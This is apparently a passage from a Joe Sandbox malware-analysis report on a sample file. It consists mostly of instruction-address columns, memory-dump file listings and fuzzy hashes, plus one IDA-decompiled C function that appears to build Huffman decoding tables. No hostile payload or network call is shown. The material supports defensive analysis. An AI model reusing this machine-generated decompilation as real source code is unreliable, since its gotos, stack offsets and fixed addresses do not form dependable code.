                                                        0x00406fe4
                                                        0x00406fe7
                                                        0x00406fe9
                                                        0x00406fec
                                                        0x00406fef
                                                        0x00406fef
                                                        0x00406fef
                                                        0x00406fef
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040669d
                                                        0x00406681
                                                        0x00000000
                                                        0x00406687
                                                        0x0040668a
                                                        0x00406694
                                                        0x00406697
                                                        0x0040669a
                                                        0x00000000
                                                        0x0040669a
                                                        0x00406681
                                                        0x004066a5
                                                        0x004066a8
                                                        0x004066ac
                                                        0x004066b6
                                                        0x004066c0
                                                        0x004066c3
                                                        0x004066c9
                                                        0x004067fd
                                                        0x004067ff
                                                        0x00406805
                                                        0x00406808
                                                        0x0040680b
                                                        0x00000000
                                                        0x0040680b
                                                        0x004066cf
                                                        0x004066cf
                                                        0x004066d0
                                                        0x00406728
                                                        0x00406728
                                                        0x0040672f
                                                        0x004067d5
                                                        0x004067d5
                                                        0x004067da
                                                        0x004067dd
                                                        0x004067e2
                                                        0x004067e5
                                                        0x004067ea
                                                        0x004067ed
                                                        0x004067f2
                                                        0x004067f5
                                                        0x004067f5
                                                        0x00000000
                                                        0x00406735
                                                        0x00406735
                                                        0x00406735
                                                        0x00406735
                                                        0x00406739
                                                        0x0040673e
                                                        0x0040673e
                                                        0x0040673e
                                                        0x00406743
                                                        0x00406745
                                                        0x00406747
                                                        0x0040674c
                                                        0x00406752
                                                        0x00406757
                                                        0x00406759
                                                        0x00406759
                                                        0x0040674e
                                                        0x0040674e
                                                        0x0040674e
                                                        0x0040674c
                                                        0x0040675b
                                                        0x0040675e
                                                        0x00406760
                                                        0x00406763
                                                        0x00406763
                                                        0x00406797
                                                        0x0040679c
                                                        0x0040679e
                                                        0x0040679f
                                                        0x004067a1
                                                        0x004067a2
                                                        0x004067a2
                                                        0x004067a2
                                                        0x004067ca
                                                        0x004067cf
                                                        0x004067cf
                                                        0x00000000
                                                        0x004067cf
                                                        0x0040672f
                                                        0x004066d2
                                                        0x004066d2
                                                        0x004066d3
                                                        0x0040671d
                                                        0x00000000
                                                        0x0040671d
                                                        0x004066d5
                                                        0x004066d6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406832
                                                        0x00406832
                                                        0x00406832
                                                        0x00406835
                                                        0x00000000
                                                        0x00000000
                                                        0x00406812
                                                        0x00406812
                                                        0x00406816
                                                        0x00000000
                                                        0x00000000
                                                        0x0040681c
                                                        0x0040681c
                                                        0x0040681f
                                                        0x00406822
                                                        0x00406827
                                                        0x00406829
                                                        0x0040682c
                                                        0x0040682f
                                                        0x0040682f
                                                        0x0040682f
                                                        0x00406837
                                                        0x00406837
                                                        0x0040683a
                                                        0x0040683c
                                                        0x00406841
                                                        0x00406844
                                                        0x00406846
                                                        0x00406849
                                                        0x00000000
                                                        0x00000000
                                                        0x0040684f
                                                        0x0040684f
                                                        0x00406851
                                                        0x00000000
                                                        0x00000000
                                                        0x00406857
                                                        0x00406857
                                                        0x0040685b
                                                        0x00000000
                                                        0x00000000
                                                        0x00406861
                                                        0x00406861
                                                        0x00406864
                                                        0x00406866
                                                        0x00406904
                                                        0x00406904
                                                        0x00406907
                                                        0x00406909
                                                        0x00406909
                                                        0x0040690c
                                                        0x0040690f
                                                        0x00406911
                                                        0x00406913
                                                        0x00406915
                                                        0x00406915
                                                        0x0040691e
                                                        0x00406923
                                                        0x00406926
                                                        0x00406929
                                                        0x0040692c
                                                        0x0040692f
                                                        0x0040692f
                                                        0x0040692f
                                                        0x00406932
                                                        0x00406938
                                                        0x00406938
                                                        0x0040693e
                                                        0x0040693e
                                                        0x0040693e
                                                        0x00000000
                                                        0x00406932
                                                        0x0040686c
                                                        0x0040686c
                                                        0x00406872
                                                        0x00406875
                                                        0x00406877
                                                        0x004068a2
                                                        0x004068a5
                                                        0x004068ab
                                                        0x004068b0
                                                        0x004068b6
                                                        0x004068bc
                                                        0x004068be
                                                        0x004068c1
                                                        0x004068ca
                                                        0x004068d0
                                                        0x004068d0
                                                        0x004068c3
                                                        0x004068c5
                                                        0x004068c7
                                                        0x004068c7
                                                        0x004068d2
                                                        0x004068d8
                                                        0x004068db
                                                        0x004068dd
                                                        0x004068df
                                                        0x004068e5
                                                        0x004068e7
                                                        0x004068e9
                                                        0x004068ec
                                                        0x004068f5
                                                        0x004068f5
                                                        0x004068f7
                                                        0x004068ee
                                                        0x004068ee
                                                        0x004068f1
                                                        0x004068f1
                                                        0x004068f9
                                                        0x004068f9
                                                        0x004068e7
                                                        0x004068fc
                                                        0x004068fe
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004068fe
                                                        0x00406879
                                                        0x00406879
                                                        0x0040687f
                                                        0x00406885
                                                        0x00406887
                                                        0x00000000
                                                        0x00000000
                                                        0x00406889
                                                        0x00406889
                                                        0x0040688b
                                                        0x0040688d
                                                        0x00406890
                                                        0x00406897
                                                        0x00406897
                                                        0x00406899
                                                        0x00406892
                                                        0x00406892
                                                        0x00406894
                                                        0x00406894
                                                        0x0040689b
                                                        0x0040689d
                                                        0x004068a0
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004069a4
                                                        0x004069a7
                                                        0x004069aa
                                                        0x004069b0
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b87
                                                        0x00406b87
                                                        0x00406b87
                                                        0x00406b8a
                                                        0x00406b8d
                                                        0x00406b8f
                                                        0x00406b92
                                                        0x00406b98
                                                        0x00406b9f
                                                        0x00406ba1
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a75
                                                        0x00406a75
                                                        0x00406a9d
                                                        0x00406a9d
                                                        0x00406a9d
                                                        0x00406a9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a7d
                                                        0x00406a7d
                                                        0x00406a81
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a87
                                                        0x00406a87
                                                        0x00406a8a
                                                        0x00406a8d
                                                        0x00406a90
                                                        0x00406a92
                                                        0x00406a94
                                                        0x00406a97
                                                        0x00406a9a
                                                        0x00406a9a
                                                        0x00406a9a
                                                        0x00406aa1
                                                        0x00406aa1
                                                        0x00406aa9
                                                        0x00406aac
                                                        0x00406ab2
                                                        0x00406ab5
                                                        0x00406ab9
                                                        0x00406abd
                                                        0x00406ac0
                                                        0x00406ac3
                                                        0x00406adb
                                                        0x00406adb
                                                        0x00406ade
                                                        0x00406aec
                                                        0x00406aef
                                                        0x00406ae0
                                                        0x00406ae0
                                                        0x00406ae2
                                                        0x00406ae9
                                                        0x00406ae9
                                                        0x00406b18
                                                        0x00406b18
                                                        0x00406b18
                                                        0x00406b1b
                                                        0x00406b1d
                                                        0x00000000
                                                        0x00000000
                                                        0x00406af8
                                                        0x00406af8
                                                        0x00406afc
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b02
                                                        0x00406b02
                                                        0x00406b05
                                                        0x00406b08
                                                        0x00406b0b
                                                        0x00406b0d
                                                        0x00406b0f
                                                        0x00406b12
                                                        0x00406b15
                                                        0x00406b15
                                                        0x00406b15
                                                        0x00406b1f
                                                        0x00406b1f
                                                        0x00406b21
                                                        0x00406b23
                                                        0x00406b2e
                                                        0x00406b31
                                                        0x00406b34
                                                        0x00406b36
                                                        0x00406b38
                                                        0x00406b3a
                                                        0x00406b3d
                                                        0x00406b40
                                                        0x00406b45
                                                        0x00406b48
                                                        0x00406b4b
                                                        0x00406b4e
                                                        0x00406b55
                                                        0x00406b58
                                                        0x00406b5a
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b60
                                                        0x00406b60
                                                        0x00406b64
                                                        0x00406b75
                                                        0x00406b75
                                                        0x00406b75
                                                        0x00406b77
                                                        0x00406b77
                                                        0x00406b7b
                                                        0x00406b7b
                                                        0x00406b7b
                                                        0x00406b7d
                                                        0x00406b7e
                                                        0x00406b81
                                                        0x00406b81
                                                        0x00406b81
                                                        0x00406b84
                                                        0x00000000
                                                        0x00406b84
                                                        0x00406b66
                                                        0x00406b66
                                                        0x00406b69
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b6f
                                                        0x00406b6f
                                                        0x00000000
                                                        0x00406b6f
                                                        0x00406ac5
                                                        0x00406ac5
                                                        0x00406ac7
                                                        0x00406ac9
                                                        0x00406acc
                                                        0x00406acf
                                                        0x00406ad3
                                                        0x00406ad3
                                                        0x00406ba7
                                                        0x00406ba7
                                                        0x00406baa
                                                        0x00406bb1
                                                        0x00406bb5
                                                        0x00406bb7
                                                        0x00406bba
                                                        0x00406bbd
                                                        0x00406bc2
                                                        0x00406bc5
                                                        0x00406bc7
                                                        0x00406bc8
                                                        0x00406bcb
                                                        0x00406bd6
                                                        0x00406bd9
                                                        0x00406bf0
                                                        0x00406bf5
                                                        0x00406bfc
                                                        0x00406c01
                                                        0x00406c05
                                                        0x00406c07
                                                        0x00406c07
                                                        0x00406c07
                                                        0x00406c0a
                                                        0x00406c0c
                                                        0x00000000
                                                        0x00406c12
                                                        0x00406c12
                                                        0x00406c16
                                                        0x00406c21
                                                        0x00406c34
                                                        0x00406c39
                                                        0x00406c3e
                                                        0x00406c40
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c46
                                                        0x00406c46
                                                        0x00406c49
                                                        0x00406c4b
                                                        0x00406c59
                                                        0x00406c59
                                                        0x00406c5c
                                                        0x00406c5c
                                                        0x00406c5f
                                                        0x00406c62
                                                        0x00406c65
                                                        0x00406c68
                                                        0x00406c6b
                                                        0x00406c6e
                                                        0x00000000
                                                        0x00406c6e
                                                        0x00406c4d
                                                        0x00406c4d
                                                        0x00406c53
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c53
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ff2
                                                        0x00406ff2
                                                        0x00406ff8
                                                        0x00406ffe
                                                        0x00407003
                                                        0x00407009
                                                        0x0040700f
                                                        0x00407011
                                                        0x00407014
                                                        0x0040701d
                                                        0x00407023
                                                        0x00407023
                                                        0x00407016
                                                        0x00407018
                                                        0x0040701a
                                                        0x0040701a
                                                        0x00407025
                                                        0x00407027
                                                        0x0040702a
                                                        0x00407065
                                                        0x00407065
                                                        0x00000000
                                                        0x0040702c
                                                        0x0040702c
                                                        0x0040702c
                                                        0x00407032
                                                        0x00407035
                                                        0x00407037
                                                        0x0040706c
                                                        0x0040706e
                                                        0x00000000
                                                        0x0040706e
                                                        0x00000000
                                                        0x00407037
                                                        0x00000000
                                                        0x00406676
                                                        0x00407044
                                                        0x00000000
                                                        0x00407044
                                                        0x00406a58
                                                        0x00406a5a
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a5c
                                                        0x00406a5c
                                                        0x00406a5f
                                                        0x00000000
                                                        0x00406a5f
                                                        0x004069a4
                                                        0x00406965
                                                        0x00407049
                                                        0x0040704c
                                                        0x0040704e
                                                        0x00407057
                                                        0x0040705d
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                        • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                        • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                        • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E0040711C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                        				signed int _v8;
                                                        				unsigned int _v12;
                                                        				signed int _v16;
                                                        				intOrPtr _v20;
                                                        				signed int _v24;
                                                        				signed int _v28;
                                                        				intOrPtr* _v32;
                                                        				signed int* _v36;
                                                        				signed int _v40;
                                                        				signed int _v44;
                                                        				intOrPtr _v48;
                                                        				intOrPtr _v52;
                                                        				void _v116;
                                                        				signed int _v176;
                                                        				signed int _v180;
                                                        				signed int _v240;
                                                        				signed int _t166;
                                                        				signed int _t168;
                                                        				intOrPtr _t175;
                                                        				signed int _t181;
                                                        				void* _t182;
                                                        				intOrPtr _t183;
                                                        				signed int* _t184;
                                                        				signed int _t186;
                                                        				signed int _t187;
                                                        				signed int* _t189;
                                                        				signed int _t190;
                                                        				intOrPtr* _t191;
                                                        				intOrPtr _t192;
                                                        				signed int _t193;
                                                        				signed int _t195;
                                                        				signed int _t200;
                                                        				signed int _t205;
                                                        				void* _t207;
                                                        				short _t208;
                                                        				signed char _t222;
                                                        				signed int _t224;
                                                        				signed int _t225;
                                                        				signed int* _t232;
                                                        				signed int _t233;
                                                        				signed int _t234;
                                                        				void* _t235;
                                                        				signed int _t236;
                                                        				signed int _t244;
                                                        				signed int _t246;
                                                        				signed int _t251;
                                                        				signed int _t254;
                                                        				signed int _t256;
                                                        				signed int _t259;
                                                        				signed int _t262;
                                                        				void* _t263;
                                                        				void* _t264;
                                                        				signed int _t267;
                                                        				intOrPtr _t269;
                                                        				intOrPtr _t271;
                                                        				signed int _t274;
                                                        				intOrPtr* _t275;
                                                        				unsigned int _t276;
                                                        				void* _t277;
                                                        				signed int _t278;
                                                        				intOrPtr* _t279;
                                                        				signed int _t281;
                                                        				intOrPtr _t282;
                                                        				intOrPtr _t283;
                                                        				signed int* _t284;
                                                        				signed int _t286;
                                                        				signed int _t287;
                                                        				signed int _t288;
                                                        				signed int _t296;
                                                        				signed int* _t297;
                                                        				intOrPtr _t298;
                                                        				void* _t299;
                                                        
                                                        				_t278 = _a8;
                                                        				_t187 = 0x10;
                                                        				memset( &_v116, 0, _t187 << 2);
                                                        				_t189 = _a4;
                                                        				_t233 = _t278;
                                                        				do {
                                                        					_t166 =  *_t189;
                                                        					_t189 =  &(_t189[1]);
                                                        					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                        					_t233 = _t233 - 1;
                                                        				} while (_t233 != 0);
                                                        				if(_v116 != _t278) {
                                                        					_t279 = _a28;
                                                        					_t267 =  *_t279;
                                                        					_t190 = 1;
                                                        					_a28 = _t267;
                                                        					_t234 = 0xf;
                                                        					while(1) {
                                                        						_t168 = 0;
                                                        						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                        							break;
                                                        						}
                                                        						_t190 = _t190 + 1;
                                                        						if(_t190 <= _t234) {
                                                        							continue;
                                                        						}
                                                        						break;
                                                        					}
                                                        					_v8 = _t190;
                                                        					if(_t267 < _t190) {
                                                        						_a28 = _t190;
                                                        					}
                                                        					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                        						_t234 = _t234 - 1;
                                                        						if(_t234 != 0) {
                                                        							continue;
                                                        						}
                                                        						break;
                                                        					}
                                                        					_v28 = _t234;
                                                        					if(_a28 > _t234) {
                                                        						_a28 = _t234;
                                                        					}
                                                        					 *_t279 = _a28;
                                                        					_t181 = 1 << _t190;
                                                        					while(_t190 < _t234) {
                                                        						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                        						if(_t182 < 0) {
                                                        							L64:
                                                        							return _t168 | 0xffffffff;
                                                        						}
                                                        						_t190 = _t190 + 1;
                                                        						_t181 = _t182 + _t182;
                                                        					}
                                                        					_t281 = _t234 << 2;
                                                        					_t191 = _t299 + _t281 - 0x70;
                                                        					_t269 =  *_t191;
                                                        					_t183 = _t181 - _t269;
                                                        					_v52 = _t183;
                                                        					if(_t183 < 0) {
                                                        						goto L64;
                                                        					}
                                                        					_v176 = _t168;
                                                        					 *_t191 = _t269 + _t183;
                                                        					_t192 = 0;
                                                        					_t235 = _t234 - 1;
                                                        					if(_t235 == 0) {
                                                        						L21:
                                                        						_t184 = _a4;
                                                        						_t271 = 0;
                                                        						do {
                                                        							_t193 =  *_t184;
                                                        							_t184 =  &(_t184[1]);
                                                        							if(_t193 != _t168) {
                                                        								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                        								_t236 =  *_t232;
                                                        								 *((intOrPtr*)(0x42d6a8 + _t236 * 4)) = _t271;
                                                        								 *_t232 = _t236 + 1;
                                                        							}
                                                        							_t271 = _t271 + 1;
                                                        						} while (_t271 < _a8);
                                                        						_v16 = _v16 | 0xffffffff;
                                                        						_v40 = _v40 & 0x00000000;
                                                        						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                        						_t195 = _v8;
                                                        						_t186 =  ~_a28;
                                                        						_v12 = _t168;
                                                        						_v180 = _t168;
                                                        						_v36 = 0x42d6a8;
                                                        						_v240 = _t168;
                                                        						if(_t195 > _v28) {
                                                        							L62:
                                                        							_t168 = 0;
                                                        							if(_v52 == 0 || _v28 == 1) {
                                                        								return _t168;
                                                        							} else {
                                                        								goto L64;
                                                        							}
                                                        						}
                                                        						_v44 = _t195 - 1;
                                                        						_v32 = _t299 + _t195 * 4 - 0x70;
                                                        						do {
                                                        							_t282 =  *_v32;
                                                        							if(_t282 == 0) {
                                                        								goto L61;
                                                        							}
                                                        							while(1) {
                                                        								_t283 = _t282 - 1;
                                                        								_t200 = _a28 + _t186;
                                                        								_v48 = _t283;
                                                        								_v24 = _t200;
                                                        								if(_v8 <= _t200) {
                                                        									goto L45;
                                                        								}
                                                        								L31:
                                                        								_v20 = _t283 + 1;
                                                        								do {
                                                        									_v16 = _v16 + 1;
                                                        									_t296 = _v28 - _v24;
                                                        									if(_t296 > _a28) {
                                                        										_t296 = _a28;
                                                        									}
                                                        									_t222 = _v8 - _v24;
                                                        									_t254 = 1 << _t222;
                                                        									if(1 <= _v20) {
                                                        										L40:
                                                        										_t256 =  *_a36;
                                                        										_t168 = 1 << _t222;
                                                        										_v40 = 1;
                                                        										_t274 = _t256 + 1;
                                                        										if(_t274 > 0x5a0) {
                                                        											goto L64;
                                                        										}
                                                        									} else {
                                                        										_t275 = _v32;
                                                        										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                        										if(_t222 >= _t296) {
                                                        											goto L40;
                                                        										}
                                                        										while(1) {
                                                        											_t222 = _t222 + 1;
                                                        											if(_t222 >= _t296) {
                                                        												goto L40;
                                                        											}
                                                        											_t275 = _t275 + 4;
                                                        											_t264 = _t263 + _t263;
                                                        											_t175 =  *_t275;
                                                        											if(_t264 <= _t175) {
                                                        												goto L40;
                                                        											}
                                                        											_t263 = _t264 - _t175;
                                                        										}
                                                        										goto L40;
                                                        									}
                                                        									_t168 = _a32 + _t256 * 4;
                                                        									_t297 = _t299 + _v16 * 4 - 0xec;
                                                        									 *_a36 = _t274;
                                                        									_t259 = _v16;
                                                        									 *_t297 = _t168;
                                                        									if(_t259 == 0) {
                                                        										 *_a24 = _t168;
                                                        									} else {
                                                        										_t276 = _v12;
                                                        										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                        										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                        										_a5 = _a28;
                                                        										_a4 = _t222;
                                                        										_t262 = _t276 >> _t186;
                                                        										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                        										 *(_t298 + _t262 * 4) = _a4;
                                                        									}
                                                        									_t224 = _v24;
                                                        									_t186 = _t224;
                                                        									_t225 = _t224 + _a28;
                                                        									_v24 = _t225;
                                                        								} while (_v8 > _t225);
                                                        								L45:
                                                        								_t284 = _v36;
                                                        								_a5 = _v8 - _t186;
                                                        								if(_t284 < 0x42d6a8 + _a8 * 4) {
                                                        									_t205 =  *_t284;
                                                        									if(_t205 >= _a12) {
                                                        										_t207 = _t205 - _a12 + _t205 - _a12;
                                                        										_v36 =  &(_v36[1]);
                                                        										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                        										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                        									} else {
                                                        										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                        										_t208 =  *_t284;
                                                        										_v36 =  &(_t284[1]);
                                                        									}
                                                        									_a6 = _t208;
                                                        								} else {
                                                        									_a4 = 0xc0;
                                                        								}
                                                        								_t286 = 1 << _v8 - _t186;
                                                        								_t244 = _v12 >> _t186;
                                                        								while(_t244 < _v40) {
                                                        									 *(_t168 + _t244 * 4) = _a4;
                                                        									_t244 = _t244 + _t286;
                                                        								}
                                                        								_t287 = _v12;
                                                        								_t246 = 1 << _v44;
                                                        								while((_t287 & _t246) != 0) {
                                                        									_t287 = _t287 ^ _t246;
                                                        									_t246 = _t246 >> 1;
                                                        								}
                                                        								_t288 = _t287 ^ _t246;
                                                        								_v20 = 1;
                                                        								_v12 = _t288;
                                                        								_t251 = _v16;
                                                        								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                        									L60:
                                                        									if(_v48 != 0) {
                                                        										_t282 = _v48;
                                                        										_t283 = _t282 - 1;
                                                        										_t200 = _a28 + _t186;
                                                        										_v48 = _t283;
                                                        										_v24 = _t200;
                                                        										if(_v8 <= _t200) {
                                                        											goto L45;
                                                        										}
                                                        										goto L31;
                                                        									}
                                                        									break;
                                                        								} else {
                                                        									goto L58;
                                                        								}
                                                        								do {
                                                        									L58:
                                                        									_t186 = _t186 - _a28;
                                                        									_t251 = _t251 - 1;
                                                        								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                        								_v16 = _t251;
                                                        								goto L60;
                                                        							}
                                                        							L61:
                                                        							_v8 = _v8 + 1;
                                                        							_v32 = _v32 + 4;
                                                        							_v44 = _v44 + 1;
                                                        						} while (_v8 <= _v28);
                                                        						goto L62;
                                                        					}
                                                        					_t277 = 0;
                                                        					do {
                                                        						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                        						_t277 = _t277 + 4;
                                                        						_t235 = _t235 - 1;
                                                        						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                        					} while (_t235 != 0);
                                                        					goto L21;
                                                        				}
                                                        				 *_a24 =  *_a24 & 0x00000000;
                                                        				 *_a28 =  *_a28 & 0x00000000;
                                                        				return 0;
                                                        			}











































































                                                        0x00407127
                                                        0x0040712f
                                                        0x00407133
                                                        0x00407135
                                                        0x00407138
                                                        0x0040713a
                                                        0x0040713a
                                                        0x0040713c
                                                        0x00407143
                                                        0x00407145
                                                        0x00407145
                                                        0x0040714b
                                                        0x00407160
                                                        0x00407168
                                                        0x0040716a
                                                        0x0040716c
                                                        0x0040716f
                                                        0x00407170
                                                        0x00407170
                                                        0x00407176
                                                        0x00000000
                                                        0x00000000
                                                        0x00407178
                                                        0x0040717b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040717b
                                                        0x0040717f
                                                        0x00407182
                                                        0x00407184
                                                        0x00407184
                                                        0x00407187
                                                        0x0040718d
                                                        0x0040718e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040718e
                                                        0x00407193
                                                        0x00407196
                                                        0x00407198
                                                        0x00407198
                                                        0x0040719e
                                                        0x004071a0
                                                        0x004071b1
                                                        0x004071a4
                                                        0x004071a8
                                                        0x0040744d
                                                        0x00000000
                                                        0x0040744d
                                                        0x004071ae
                                                        0x004071af
                                                        0x004071af
                                                        0x004071b7
                                                        0x004071ba
                                                        0x004071be
                                                        0x004071c0
                                                        0x004071c2
                                                        0x004071c5
                                                        0x00000000
                                                        0x00000000
                                                        0x004071cd
                                                        0x004071d3
                                                        0x004071d5
                                                        0x004071d7
                                                        0x004071d8
                                                        0x004071ed
                                                        0x004071ed
                                                        0x004071f0
                                                        0x004071f2
                                                        0x004071f2
                                                        0x004071f4
                                                        0x004071f9
                                                        0x004071fb
                                                        0x00407202
                                                        0x00407204
                                                        0x0040720c
                                                        0x0040720c
                                                        0x0040720e
                                                        0x0040720f
                                                        0x0040721e
                                                        0x00407222
                                                        0x00407226
                                                        0x00407229
                                                        0x0040722c
                                                        0x00407231
                                                        0x00407234
                                                        0x0040723a
                                                        0x00407241
                                                        0x00407247
                                                        0x00407440
                                                        0x00407440
                                                        0x00407445
                                                        0x00407454
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00407445
                                                        0x00407254
                                                        0x00407257
                                                        0x0040725a
                                                        0x0040725d
                                                        0x00407261
                                                        0x00000000
                                                        0x00000000
                                                        0x0040726c
                                                        0x0040726f
                                                        0x00407270
                                                        0x00407272
                                                        0x00407278
                                                        0x0040727b
                                                        0x00000000
                                                        0x00000000
                                                        0x00407281
                                                        0x00407282
                                                        0x00407285
                                                        0x00407288
                                                        0x0040728b
                                                        0x00407291
                                                        0x00407293
                                                        0x00407293
                                                        0x0040729b
                                                        0x0040729f
                                                        0x004072a4
                                                        0x004072c9
                                                        0x004072cf
                                                        0x004072d1
                                                        0x004072d3
                                                        0x004072d6
                                                        0x004072df
                                                        0x00000000
                                                        0x00000000
                                                        0x004072a6
                                                        0x004072a6
                                                        0x004072af
                                                        0x004072b3
                                                        0x00000000
                                                        0x00000000
                                                        0x004072c4
                                                        0x004072c4
                                                        0x004072c7
                                                        0x00000000
                                                        0x00000000
                                                        0x004072b7
                                                        0x004072ba
                                                        0x004072bc
                                                        0x004072c0
                                                        0x00000000
                                                        0x00000000
                                                        0x004072c2
                                                        0x004072c2
                                                        0x00000000
                                                        0x004072c4
                                                        0x004072e8
                                                        0x004072ee
                                                        0x004072f8
                                                        0x004072fa
                                                        0x004072ff
                                                        0x00407301
                                                        0x00407337
                                                        0x00407303
                                                        0x00407303
                                                        0x00407306
                                                        0x00407309
                                                        0x00407313
                                                        0x00407316
                                                        0x0040731d
                                                        0x00407328
                                                        0x0040732f
                                                        0x0040732f
                                                        0x00407339
                                                        0x0040733c
                                                        0x0040733e
                                                        0x00407344
                                                        0x00407344
                                                        0x0040734d
                                                        0x00407350
                                                        0x00407355
                                                        0x00407364
                                                        0x0040736c
                                                        0x00407371
                                                        0x00407395
                                                        0x0040739d
                                                        0x004073a1
                                                        0x004073a7
                                                        0x00407373
                                                        0x00407381
                                                        0x00407384
                                                        0x0040738a
                                                        0x0040738a
                                                        0x004073ab
                                                        0x00407366
                                                        0x00407366
                                                        0x00407366
                                                        0x004073bc
                                                        0x004073c0
                                                        0x004073cc
                                                        0x004073c7
                                                        0x004073ca
                                                        0x004073ca
                                                        0x004073d4
                                                        0x004073d9
                                                        0x004073e1
                                                        0x004073dd
                                                        0x004073df
                                                        0x004073df
                                                        0x004073e7
                                                        0x004073e9
                                                        0x004073f0
                                                        0x004073fa
                                                        0x00407404
                                                        0x00407420
                                                        0x00407424
                                                        0x00407269
                                                        0x0040726f
                                                        0x00407270
                                                        0x00407272
                                                        0x00407278
                                                        0x0040727b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040727b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00407406
                                                        0x00407406
                                                        0x00407406
                                                        0x0040740b
                                                        0x00407414
                                                        0x0040741d
                                                        0x00000000
                                                        0x0040741d
                                                        0x0040742a
                                                        0x0040742a
                                                        0x0040742d
                                                        0x00407434
                                                        0x00407437
                                                        0x00000000
                                                        0x0040725a
                                                        0x004071da
                                                        0x004071dc
                                                        0x004071dc
                                                        0x004071e0
                                                        0x004071e3
                                                        0x004071e4
                                                        0x004071e4
                                                        0x00000000
                                                        0x004071dc
                                                        0x00407150
                                                        0x00407156
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
